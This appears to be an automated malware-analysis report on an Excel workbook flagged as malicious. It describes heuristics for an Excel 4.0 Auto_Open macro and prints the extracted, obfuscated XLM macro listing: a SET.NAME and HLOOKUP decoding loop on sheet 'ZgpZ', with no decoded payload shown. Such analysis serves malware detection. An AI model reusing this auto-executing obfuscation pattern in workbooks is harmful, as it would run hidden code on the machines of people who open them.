Verdict: MALICIOUS
Risk Score: 140
Heuristics: 3
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts: 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6617 bytes |

SHA-256: 5d3b12200139bc5d57207a4706b96424033b7242f299691f5ca29cdebafb34d1

Preview script (first 1,000 lines of the extracted script):
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 13 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - ZgpZ
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!A160
' 0018 27 LABEL : Cell Value, String Constant - bdYRiVHJFuyw len=0
' 0018 27 LABEL : Cell Value, String Constant - cIxYIOBjMNjb len=0
' 0018 24 LABEL : Cell Value, String Constant - FknPkRxKJ len=0
' 0018 25 LABEL : Cell Value, String Constant - gCTCDadfkW len=0
' 0018 22 LABEL : Cell Value, String Constant - hNyPNLp len=0
' 0018 21 LABEL : Cell Value, String Constant - JRSndG len=0
' 0018 22 LABEL : Cell Value, String Constant - kiFmGTZ len=0
' 0018 26 LABEL : Cell Value, String Constant - ksJkVswPXZF len=0
' 0018 22 LABEL : Cell Value, String Constant - oqMcpFU len=0
' 0018 27 LABEL : Cell Value, String Constant - PIpZeSGMHNVG len=0
' 0018 25 LABEL : Cell Value, String Constant - PsJjfgRWOL len=0
' 0018 25 LABEL : Cell Value, String Constant - QXRXRqpGGI len=0
' 0018 20 LABEL : Cell Value, String Constant - qyuhQ len=0
' 0018 24 LABEL : Cell Value, String Constant - TMUGltGGy len=0
' 0018 22 LABEL : Cell Value, String Constant - vGSOQtb len=0
' 0018 25 LABEL : Cell Value, String Constant - vMcYdKpPON len=0
' 0018 26 LABEL : Cell Value, String Constant - VqAhSdrvbsL len=0
' 0018 21 LABEL : Cell Value, String Constant - XanBeN len=0
' 0018 26 LABEL : Cell Value, String Constant - yMxLePRJouT len=0
' 0018 20 LABEL : Cell Value, String Constant - zXLNH len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' ZgpZ,S43,"",-16.00000000000000000000
' ZgpZ,S44,"",-161.00000000000000000000
' ZgpZ,S45,"",541.00000000000000000000
' ZgpZ,S46,"",-943.00000000000000000000
' ZgpZ,S47,"",-201.00000000000000000000
' ZgpZ,S48,"",-862.00000000000000000000
' ZgpZ,A73,"SET.NAME("cIxYIOBjMNjb",0+VALUE("0"))",""
' ZgpZ,A76,"SET.NAME("hNyPNLp",cIxYIOBjMNjb)",""
' ZgpZ,A81,"SET.NAME("QXRXRqpGGI",cIxYIOBjMNjb)",""
' ZgpZ,A83,"SET.NAME("JRSndG",COUNTA(TMUGltGGy))",""
' ZgpZ,A85,"SET.NAME("vGSOQtb",COUNTA(yMxLePRJouT))",""
' ZgpZ,A88,[],""
' ZgpZ,A93,"SET.NAME("VqAhSdrvbsL","")",""
' ZgpZ,A95,"hNyPNLp",""
' ZgpZ,A100,"SET.NAME("PIpZeSGMHNVG",HLOOKUP("*",TMUGltGGy,hNyPNLp,FALSE))",""
' ZgpZ,A105,"XanBeN",""
' ZgpZ,A107,"SET.NAME("qyuhQ",cIxYIOBjMNjb)",""
' ZgpZ,A112,[],""
' ZgpZ,A116,"qyuhQ",""
' ZgpZ,A118,"vMcYdKpPON",""
' ZgpZ,A120,"bdYRiVHJFuyw",""
' ZgpZ,A122,"zXLNH",""
' ZgpZ,A124,"SET.NAME("oqMcpFU",VALUE(HLOOKUP("*",yMxLePRJouT,zXLNH,FALSE)))",""
' ZgpZ,A127,"gCTCDadfkW",""
' ZgpZ,A132,"VqAhSdrvbsL",""
' ZgpZ,A135,"QXRXRqpGGI",""
' ZgpZ,A140,NEXT(),""
' ZgpZ,A144,"ksJkVswPXZF",""
' ZgpZ,A148,[],""
' ZgpZ,A151,"kiFmGTZ",""
' ZgpZ,A154,NEXT(),""
' ZgpZ,A158,RETURN(),""
' ZgpZ,A186,"SET.NAME("PsJjfgRWOL",A73)",""
' ZgpZ,A188,"TMUGltGGy",""
' ZgpZ,A193,"SET.NAME("yMxLePRJouT",R40C15)",""
' ZgpZ,A198,"SET.NAME("kiFmGTZ",206)",""
' ZgpZ,A203,"SET.NAME("FknPkRxKJ",1)",""
' ZgpZ,A205,PsJjfgRWOL(),""
' ZgpZ,A206,HALT(),""